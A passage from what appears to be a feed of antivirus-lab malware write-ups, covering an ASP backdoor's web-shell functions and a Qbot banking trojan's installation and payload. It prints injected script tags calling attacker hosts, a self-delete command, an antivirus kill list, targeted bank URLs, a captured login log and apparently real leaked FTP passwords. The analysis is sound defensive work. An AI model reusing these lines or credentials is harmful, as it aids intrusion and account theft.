&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The program consists of a set of backdoors using different vulnerabilities to access a user's computer, as well as to obtain confidential information. It is designed to test a web server on a user’s computer.
&lt;/p&gt;&lt;p&gt;Once launched, the program displays a window with different settings where it is possible to select one of the following items:
&lt;/p&gt;&lt;p&gt;1. login
&lt;/p&gt;&lt;p&gt;2. PageList
&lt;/p&gt;&lt;p&gt;3. objOnSrv
&lt;/p&gt;&lt;p&gt;4. ServiceList
&lt;/p&gt;&lt;p&gt;5. userList
&lt;/p&gt;&lt;p&gt;6. CSInfo
&lt;/p&gt;&lt;p&gt;7. infoAboutSrv
&lt;/p&gt;&lt;p&gt;8. AppFileExplorer
&lt;/p&gt;&lt;p&gt;9. WsCmdRun
&lt;/p&gt;&lt;p&gt;10.  FsoFileExplorer
&lt;/p&gt;&lt;p&gt;11. OtherTools
&lt;/p&gt;&lt;p&gt;12. TxtSearcher
&lt;/p&gt;&lt;p&gt;13. PageAddToMdb
&lt;/p&gt;&lt;p&gt;At the same time it is necessary to select the first item and enter the password "SPMSPM".
&lt;/p&gt;&lt;p&gt;Then a user can perform the following actions and receive the following information about a web server.
&lt;/p&gt;&lt;p&gt;1. Function for enter the password.
&lt;/p&gt;&lt;p&gt;2. Displaying a list of functions that can be used with this program;
&lt;/p&gt;&lt;p&gt;3. Displaying information about the components available on a web server;
&lt;/p&gt;&lt;p&gt;4. Receiving information about services that are running on a user’s computer (a service name, a path, a description, startup parameters, a status, a type of service) using Password Never Expires (WinNT Provider);
&lt;/p&gt;&lt;p&gt;5. Displaying information about computer accounts (a user name, a password, an account type, a date of last login, etc.)
&lt;/p&gt;&lt;p&gt;6. Displaying data from containers Application, Session and Cookie web server;
&lt;/p&gt;&lt;p&gt;7. Obtaining information about a web server:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; a server name;
&lt;/li&gt;&lt;li&gt; IP address of a server;
&lt;/li&gt;&lt;li&gt; a used port;
&lt;/li&gt;&lt;li&gt; HTTP software used on a server;
&lt;/li&gt;&lt;li&gt; a full path to a server;
&lt;/li&gt;&lt;li&gt; current server time;
&lt;/li&gt;&lt;li&gt; a number of processors;
&lt;/li&gt;&lt;li&gt; information about a processor and operating system.
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Information about logic drives of a web server:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; a volume name;
&lt;/li&gt;&lt;li&gt; a type of file system;
&lt;/li&gt;&lt;li&gt; an amount of free space;
&lt;/li&gt;&lt;li&gt; total space;
&lt;/li&gt;&lt;li&gt; a type of logical drive.
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Information about a folder where web server’s files are located: 
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; a size;
&lt;/li&gt;&lt;li&gt; a size of directories and subdirectories;
&lt;/li&gt;&lt;li&gt; a creation date;
&lt;/li&gt;&lt;li&gt; a last access date; 
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Information about a server of terminals: 
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; a port number used by default for all new terminals created by a server; 
&lt;/li&gt;&lt;li&gt; if automatic log on is used on a user’s computer, it gets a user name and password by reading the following system registry key:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
&amp;quot;DefaultUserName&amp;quot; 
&amp;quot;DefaultPassword&amp;quot; 
&lt;/pre&gt;
&lt;p&gt;8. Using objects "adodb.stream" and "Shell.Application":
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; reading and saving contents of files with a URL, referred by the user;
&lt;/li&gt;&lt;li&gt; appending a user input;
&lt;/li&gt;&lt;li&gt; downloading and storing files with a URL, referred by a user;
&lt;/li&gt;&lt;li&gt; copying and moving files and directories;
&lt;/li&gt;&lt;li&gt; renaming files and directories;
&lt;/li&gt;&lt;li&gt; displaying attributes of files or folders, and setting attributes (hidden, system, read only, archive, without attributes, the data are not available, temporary, compressed state file, encrypted file, sparse file attribute);
&lt;/li&gt;&lt;li&gt; sending files to an address specified by a user;
&lt;/li&gt;&lt;li&gt; modifying contents of files;
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;9. Executing commands using a command line (cmd.exe);
&lt;/p&gt;&lt;p&gt;10. Using Scripting.FileSystemObject ActiveX component:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; creating files;
&lt;/li&gt;&lt;li&gt; editing or displaying contents of files;
&lt;/li&gt;&lt;li&gt; appending a user input;
&lt;/li&gt;&lt;li&gt; accessing resources introduced by a user;
&lt;/li&gt;&lt;li&gt; copying and moving files and directories;
&lt;/li&gt;&lt;li&gt; renaming files;
&lt;/li&gt;&lt;li&gt; deleting files;
&lt;/li&gt;&lt;li&gt; displaying attributes of files or directories, and setting attributes (hidden, system, read only, archive, without attributes, data are not available, temporary, compressed file, encrypted file, sparse file);
&lt;/li&gt;&lt;li&gt; performing file uploads or sending files using an object "adodb.stream", downloading or sending locations specified by a user.
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;11. Using "Microsoft.XMLHTTP" the ActiveX object to perform file downloading and saving it on a computer using the object "ADODB.Stream". A downloading link and a saving name is specified by a user.
&lt;/p&gt;&lt;p&gt;12. Using Password Never Expires (WinNT Provider) to create a user's computer account of the type "Administrator". An account name and a password are specified by a user.
&lt;/p&gt;&lt;p&gt;13. Showing contents of registry keys entered by a user.
&lt;/p&gt;&lt;p&gt;14. Searching files containing a typed text;
&lt;/p&gt;&lt;p&gt;If an action execution is failed or information is not obtained, a program displays error messages.
&lt;/p&gt;&lt;p&gt;15. Checking a possibility of using "ADODB.RecordSet", "ADODB.Stream", "ADODB.Connection" and "ADOX.Catalog" to create a database on a server that stores the file "idTop.mdb". Also the trojan examines a possibility of recording data in a database.
&lt;/p&gt;&lt;p&gt;In case of action fail, it displays a corresponding error.
&lt;/p&gt;&lt;p&gt;In addition, the trojan checks for an opportunity to work with databases:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; displaying a list of database tables;
&lt;/li&gt;&lt;li&gt; editing a table;
&lt;/li&gt;&lt;li&gt; deleting a table contents;
&lt;/li&gt;&lt;li&gt; editing a table field;
&lt;/li&gt;&lt;li&gt; saving a table field;
&lt;/li&gt;&lt;li&gt; deleting fields in a table;
&lt;/li&gt;&lt;li&gt; displaying a list of records;
&lt;/li&gt;&lt;li&gt; editing records;
&lt;/li&gt;&lt;li&gt; adding a record;
&lt;/li&gt;&lt;li&gt; updating a record;
&lt;/li&gt;&lt;li&gt; deleting a record;
&lt;/li&gt;&lt;li&gt; displaying a list of stored procedures;
&lt;/li&gt;&lt;li&gt; editing stored procedures;
&lt;/li&gt;&lt;li&gt; deleting stored procedures;
&lt;/li&gt;&lt;li&gt; displaying information about SQL view in a current database;
&lt;/li&gt;&lt;li&gt; modifying existed SQL view;
&lt;/li&gt;&lt;li&gt; displaying information about SQL view in a current database, pointing at what tables they are based - on local or remote ones;
&lt;/li&gt;&lt;li&gt; deleting SQL view of a current database;
&lt;/li&gt;&lt;li&gt; displaying information about a current database;
&lt;/li&gt;&lt;li&gt; sending a variety of SQL queries.
&lt;/li&gt;&lt;/ul&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;3. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 29 May 2011 20:57:19 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Backdoor.ASP.Ace.jd</guid>
		</item>
		<item>
			<title>Trojan-PSW.Win32.Qbot.dkg</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Qbot.dkg</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Backdoor, designed to steal confidential user data. It is a Windows (PE-EXE file). It is 331,424 bytes in size. It is packed with PE_Patch, as well as an unknown packer. The unpacked file is about 205 KB in size. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 8CACA118667B608EB4735AF3B229A546
&lt;/p&gt;&lt;p&gt;SHA1: 0B78B4CA846A7F35DC55B13D8AF8767749A97793
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor copies its body to a file:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_1&amp;gt; - is a random name (for example: "uiouy").
&lt;/p&gt;&lt;p&gt;To start the created copy automatically each time the system starts it appends a path to the backdoor copy to a registry value found in the branch:
&lt;/p&gt;
&lt;pre&gt;[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&lt;/pre&gt;
&lt;p&gt;For example:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;lt;app name&amp;gt; = &amp;quot;&amp;quot;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe&amp;quot; /c &amp;lt;old value&amp;gt;&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Also the key is created:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;&amp;lt;rnd_2&amp;gt;&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_2&amp;gt; - is a random name (for example: "jladjtrq").
&lt;/p&gt;&lt;p&gt;If you the keys cannot be created in the aforementioned branch, these actions will be performed in the branches:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
&lt;/pre&gt;
&lt;p&gt;Then the backdoor extracts from its body the following files: 
&lt;/p&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll (154784 bytes; detected by Kaspersky Antivirus as &amp;quot;Trojan-Spy.Win32.Banker.qpl&amp;quot;)

%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll (453 байта)
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_3&amp;gt; -are first 4 characters of the name &amp;lt;rnd_1&amp;gt;. 
&lt;/p&gt;&lt;p&gt;The library "&amp;lt;rnd_1&amp;gt;" implements the main backdoor functionality and will be discussed below. The file "&amp;lt;rnd_3&amp;gt;. dll" contains encrypted information to configure further malware work. The file contained the following lines for analyzed sample: 
&lt;/p&gt;
&lt;pre&gt;
cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://b***01.in/cgi-bin/ls1.pl
ftphost_1=216.***.214.95:cpanel@silfersystem.com:Pomidoro777:
ftphost_2=72.***.86.119:cpanel@gemini.com.co:Columbus101:
ftphost_3=66.***.30.219:cpanel@falahuddarain.com:Alladin71:
ftphost_4=110.***.45.64:cpanel@karnadya.com.my:Islam1120:
ftphost_5=74.***.215.107:cpanel@incitylocal.com:pieceacake100:
update_conf_ver=904
&lt;/pre&gt;
&lt;p&gt;During the work, the backdoor writes generated data to the configuration file, as well as some collected information. For example:
&lt;/p&gt;
&lt;pre&gt;
alias__qbot.cb=uiou.dll
alias__qbotinj.exe=uiouy.exe
alias__qbot.dll=uiouy.dll
alias_si.txt=larvsox
home_dir=c:\documents and settings\all users\application data\microsoft\uiouy
irc_my_nick=vwnfjq298080
install_time=21.04.00-16/05/2011
firststart_test=1
&lt;/pre&gt;
&lt;p&gt;In this case, the date and installation time (parameter "install_time") are analyzed. If the backdoor is installed later than "May 5 2011-12:46:11", then upgrading of its components is started. To do this, a connection to the host is established:
&lt;/p&gt;
&lt;pre&gt;bg***t.in
&lt;/pre&gt;
&lt;p&gt;and the following HTTP-request is sent:
&lt;/p&gt;
&lt;pre&gt;
POST /5 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTbPSI/5.11.3.15590)
Host: bg***t.in
Content-Length: 65
Cache-Control: no-cache
is=3&amp;amp;ec1=0&amp;amp;ec2=0&amp;amp;it=2&amp;amp;b=679&amp;amp;vt=0&amp;amp;ov=&amp;lt;OS version&amp;gt;&amp;amp;n=&amp;lt;value of parameter irc_my_nick&amp;gt;
&lt;/pre&gt;
&lt;p&gt;At the time of writing, the server did not respond.
&lt;/p&gt;&lt;p&gt;During installation, the backdoor collects the following information about the system:
- a user name;
&lt;/p&gt;&lt;p&gt;- a computer name;
&lt;/p&gt;&lt;p&gt;- a key value in the registry:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
&amp;quot;ProductId&amp;quot;
&lt;/pre&gt;
&lt;p&gt;- a serial number of a system drive;
&lt;/p&gt;&lt;p&gt;- a list of installed software on the infected computer. To do this, it reads the values "ProductName" in the registry branch: 
&lt;/p&gt;
&lt;pre&gt;[HKCR\Installer\Products\...]
&lt;/pre&gt;
&lt;p&gt;- IP-address of the infected computer. To determine the IP-address the following resources are used: 
&lt;/p&gt;
&lt;pre&gt;
http://www.ipaddressworld.com/
http://www.ip-adress.com
&lt;/pre&gt;
&lt;p&gt;To control the uniqueness of its process in the system the backdoor creates a unique identifier with the name:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;name of backdoor file&amp;gt;a&amp;lt;user name&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Upon completion of installation, the malware executes a previously created copy:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;and deletes its original file. To do this, an executable code is embedded into an address space of the system process "EXPLORER.EXE" that runs firstly a copy, and then the system shell "CMD.EXE" with parameters: 
&lt;/p&gt;
&lt;pre&gt;cmd /c ping -n 10 localhost &amp;amp;&amp;amp; del "&amp;lt;full path to the original backdoor file&amp;gt;"
&lt;/pre&gt;
&lt;p&gt;At this point the installation process is completed.
&lt;/p&gt;&lt;p&gt;The malicious program can be run with the following parameters:
&lt;/p&gt;&lt;p&gt;/t – the message WM_QUIT is sent to a created by the malware window "&amp;lt;rnd_1&amp;gt; &amp;lt;username&amp;gt;". Then the malware process is terminated.
&lt;/p&gt;&lt;p&gt;/s – the malware is run as a Windows service.
&lt;/p&gt;&lt;p&gt;/i – only extracting of files is performed: 
&lt;/p&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;after that the malware ends its execution.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor finds in its working directory library extracted during the installation, and call the function with the name "kIlsasgcbag0a". This sets a hook-procedure for tracking messages in the system queue. This allows the trojan to perform the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; hide files "&amp;lt;rnd_1&amp;gt;. exe", "&amp;lt;rnd_1&amp;gt;. dll" in its working directory;
&lt;/li&gt;&lt;li&gt; hide its own working directory;
&lt;/li&gt;&lt;li&gt; hide its own process in Task Manager;
&lt;/li&gt;&lt;li&gt; hide created during the installation keys in the system registry;
&lt;/li&gt;&lt;li&gt; keep track of user activity of the infected computer (keystrokes, file access, network traffic, etc.). The information obtained is recorded in the file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_4&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_4&amp;gt; - are the first 3 letters of the name &amp;lt;rnd_1&amp;gt;.
&lt;/p&gt;&lt;p&gt;Below is a part of the log created by malicious programs when a user tries to login at "&lt;a href="http://www.sovereignbank.com" class="external free"&gt;http://www.sovereignbank.com&lt;/a&gt;":
&lt;/p&gt;
&lt;pre&gt;
t=kb time=[23:46:56-17/5/2011] p=[iexplore.exe] b=[http://www.sovereignbank.com/]
t=u1 time=[23:47:35-17/5/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:47:35-17/5/2011] url=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&amp;amp;refer=/utils/net_banking_logon.asp] data=[done=yes&amp;amp;referback=%2Futils%2Fnet_banking_logon.asp&amp;amp;accountType=personal&amp;amp;state=NY] referer=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&amp;amp;refer=/utils/net_banking_logon.asp] cookie=[ACE-WEBCOOKIE-WWW=R364677618; ASPSESSIONIDQASSQDSD=IEFPNFBBDAFAACFKIHCLOKMF; s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520forms%252520/%252520regional_prefs.asp%2526pidt%253D1%2526oid%253Djavascript%25253AcheckSubmit%252528%252529%25253B%2526ot%253DA%2526oi%253D215; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.1.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)]
t=kb time=[23:48:27-17/5/2011] p=[iexplore.exe] b=[MyUserID]
t=h2 time=[23:48:27-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/rsafso.do] data=[fp_browser=mozilla%2F4.0+%28compatible%3B+msie+6.0%3B+windows+nt+5.1%3B+sv1%29%7C4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%29%7CWin32%7C%3BSP2%3B%7Cx86%7Cru%7C8820&amp;amp;fp_screen=32%7C1920%7C1080%7C1050&amp;amp;fp_software=abk%3D6%2C0%2C2600%2C0%7Cwnt%3D6%2C0%2C2900%2C2180%7Cdht%3D5%2C5000%2C3130%2C0%7Cdhj%3D6%2C0%2C1%2C223%7Cdan%3D6%2C0%2C3%2C531%7Cdsh%3D9%2C0%2C0%2C3250%7Cie5%3D6%2C0%2C2900%2C2180%7Cicw%3D5%2C0%2C2918%2C1900%7Cieh%3D6%2C0%2C2900%2C2180%7Ciee%3D4%2C74%2C9273%2C0%7Cwmp%3D9%2C0%2C0%2C3250%7Cobp%3D6%2C0%2C2900%2C2180%7Coex%3D6%2C0%2C2900%2C2180%7Cnet%3D4%2C4%2C0%2C3400%7Ctks%3D4%2C71%2C1968%2C1%7Cmvm%3D5%2C0%2C5000%2C0&amp;amp;fp_timezone=4&amp;amp;fp_language=lang%3Dru%7Csyslang%3Dru%7Cuserlang%3Dru&amp;amp;fp_java=1&amp;amp;fp_cookie=1&amp;amp;username=MyUserID&amp;amp;x=8&amp;amp;y=8] referer=[https://olb.sovereignbank.com/sovSSA/gitLogonSovbank.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=h2 time=[23:48:32-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/getfso] data=[pmdata=] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=kb time=[23:48:51-17/5/2011] p=[iexplore.exe] b=[MyPassword]
t=h2 time=[23:48:51-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/enrollpwdverf.do] data=[password=MyPassword&amp;amp;x=7&amp;amp;y=9] referer=[https://olb.sovereignbank.com/sovSSA/rsaLogon.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38;
&lt;/pre&gt;
&lt;p&gt;Also the considered library exports a function called "zupidshc21mnu", designed to remove the hook.
&lt;/p&gt;&lt;p&gt;The backdoor in a cycle tracing launch of the following processes:
&lt;/p&gt;
&lt;pre&gt;
iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe
msmsgs.exe
&lt;/pre&gt;
&lt;p&gt;If the process is found, a malicious library will be injected into its address space.
&lt;/p&gt;&lt;p&gt;The considered library implements functionality that allows, depending on the received commands from the attacker, to perform on the infected computer the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; terminates processes:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; terminates running in the system services and processes which names contain the substrings:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
webroot.
agnitum
ahnlab
arcabit
avast
avg
avira
avp
bitdefender
bit9
castlecops
centralcommand
clamav
comodo
computerassociates
cpsecure
defender
drweb
emsisoft
esafe
.eset
etrust
ewido
fortinet
f-prot
f-secure
gdata
grisoft
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
networkassociates
nod32
norman
norton
panda
pctools
prevx
quickheal
rising
rootkit
securecomputing
sophos
spamhaus
spyware
sunbelt
symantec
threatexpert
trendmicro
virus
wilderssecurity
windowsupdate
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; finds and modify files with the extensions:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
.inc
.php
.htm
.asp
.pl
.cfm
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; infects web pages on user’s FTP and HTTP server user by adding links to malicious scripts into pages:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
&amp;lt;script src=&amp;quot;http://in***ate.info/3&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=http://in***ate.info/3&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=&amp;quot;http://pr***t.in/3&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=http://pr***t.in/3&amp;gt;&amp;lt;/script&amp;gt;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; downloads files by the received from attacker links, saving them in the folder:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;%WinDir%\TEMP
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; works with files on the specified FTP-servers.
&lt;/li&gt;&lt;li&gt; updates its components, downloading updates from the attacker’s servers.
&lt;/li&gt;&lt;li&gt; controls processes and services.
&lt;/li&gt;&lt;li&gt; steals confidential user information when accessing the resources with the names that contain the substrings:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
iris.sovereignbank.com
/wires/
paylinks.cunet.org
securentrycorp.amegybank.com
businessbankingcenter.synovus.com
businessinternetbanking.synovus.com
ocm.suntrust.com
cashproonline.bankofamerica.com
singlepoint.usbank.com
netconnect.bokf.com
business-eb.ibanking-services.com
cashproonline.bankofamerica.com
/cashplus/
ebanking-services.com
/cashman/
web-cashplus.com
treas-mgt.frostbank.com
business-eb.ibanking-services.com
treasury.pncbank.com
access.jpmorgan.com
tssportal.jpmorgan.com
ktt.key.com
onlineserv/CM
premierview.membersunited.org
directline4biz.com
.webcashmgmt.com
tmconnectweb
moneymanagergps.com
ibc.klikbca.com
directpay.wellsfargo.com
express.53.com
itreasury.regions.com
itreasurypr.regions.com
cpw-achweb.bankofamerica.com
businessaccess.citibank.citigroup.com
businessonline.huntington.com
/cmserver/
goldleafach.com
ub-businessonline.blilk.com
iachwellsprod.wellsfargo.com
achbatchlisting
/achupload
commercial3.wachovia.com
wc.wachovia.com
commercial.wachovia.com
wcp.wachovia.com
chsec.wellsfargo.com
wellsoffice.wellsfargo.com
/stbcorp/
/payments/ach
trz.tranzact.org
/wiret
/payments/ach
cbs.firstcitizensonline.com
/corpach/
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; steals passwords stored in the browser Internet Explorer. To do this, an analysis of registry keys is performed in the branch:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2]
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; steals account information from Outlook Express. To do this, an analysis of registry keys is performed in the branch:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;[HKCU\Software\Microsoft\Internet Account Manager\Accounts]
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; sends an information collected on the infected computer to the specified server.
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;While running the backdoor connects to the following servers:
&lt;/p&gt;
&lt;pre&gt;
re***rver.com.ua
pp***g.in
du**.in
du**.in
yi**.com.ua
cit***omo.info
last***t.co.in
&lt;/pre&gt;
&lt;p&gt;The connection log is stored by backdoor into the file:
&lt;/p&gt;
&lt;pre&gt;c:\irclog.txt
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Reboot a computer in a “Safe Mode” (at the beginning of system boot, press and hold the «F8», then select the «Safe Mode» the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the registry keys and restore original values of the keys in system registry:
&lt;/p&gt;
